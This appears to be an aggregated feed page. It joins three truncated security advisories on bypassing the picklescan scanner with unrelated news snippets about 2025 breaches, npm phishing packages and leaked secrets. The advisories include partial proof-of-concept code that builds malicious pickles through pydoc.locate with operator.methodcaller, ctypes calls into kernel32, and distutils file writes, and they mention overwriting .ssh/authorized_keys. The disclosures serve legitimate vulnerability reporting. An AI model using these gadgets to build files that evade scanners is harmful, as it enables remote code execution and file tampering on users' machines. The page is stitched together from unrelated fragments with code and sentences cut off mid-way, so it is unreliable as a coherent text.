#git

### Summary Currently picklescanner only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly * pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string "os" to the actual os module). * operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system. Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicious file to bypass the security check. ### PoC use the provided script to create a malicious pickle file ```python import pickle import pydoc import operator import os class ModuleLocator: def __init__(self, module_name): self.module_name = module_name ...

### Summary Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to * Load DLLs * Call C functions directly * Manipulate memory raw pointers. This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory. This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected ### PoC ```python import pickle import ctypes import operator class Kernel32Loader: def __reduce__(self): #we go direct to the kerneeellllllll return (ctypes.WinDLL, ("kernel32.dll",)) class WinExecGetter: def __reduce__(self): return (operator.itemgetter("W...

### Summary Picklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files. ### Details This is another vulnerability which impacts the downstream user. By constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE. ### PoC ```python import pickle import distutils.file_util class FileWriteBypass: def __reduce__(self): target_file = "pwned_config.env" content = ["print('I have overwritten your config')"] return (distutils.file_util.write_file, (target_file, content)) payload = pickle.dumps(FileWriteBypass()) with open("bypass_filewrite.pkl", "wb") as f: f.write(payload) print("bypass_filewrite.pkl") ``` <img width="853" heig...

Last week’s cyber news in 2025 was not about one big incident. It was about many small cracks opening at the same time. Tools people trust every day behave in unexpected ways. Old flaws resurfaced. New ones were used almost immediately. A common theme ran through it all in 2025. Attackers moved faster than fixes. Access meant for work, updates, or support kept getting abused. And damage did not

From university breaches to cyberattacks that shut down whole supply chains, these were the worst cybersecurity incidents of the year.

From Donald Trump to DOGE to Chinese hackers, this year the internet’s chaos caused outsize real-world harm.

Cybersecurity researchers have disclosed details of what has been described as a "sustained and targeted" spear-phishing campaign that has published over two dozen packages to the npm registry to facilitate credential theft. The activity, which involved uploading 27 npm packages from six different npm aliases, has primarily targeted sales and commercial personnel at critical

A list of topics we covered in the week of December 22 to December 28 of 2025

In December 2024, the popular Ultralytics AI library was compromised, installing malicious code that hijacked system resources for cryptocurrency mining. In August 2025, malicious Nx packages leaked 2,349 GitHub, cloud, and AI credentials. Throughout 2024, ChatGPT vulnerabilities allowed unauthorized extraction of user data from AI memory. The result: 23.77 million secrets were leaked through AI

A hacker using the alias “Lovely” has leaked what they claim is the personal data of over 2.3…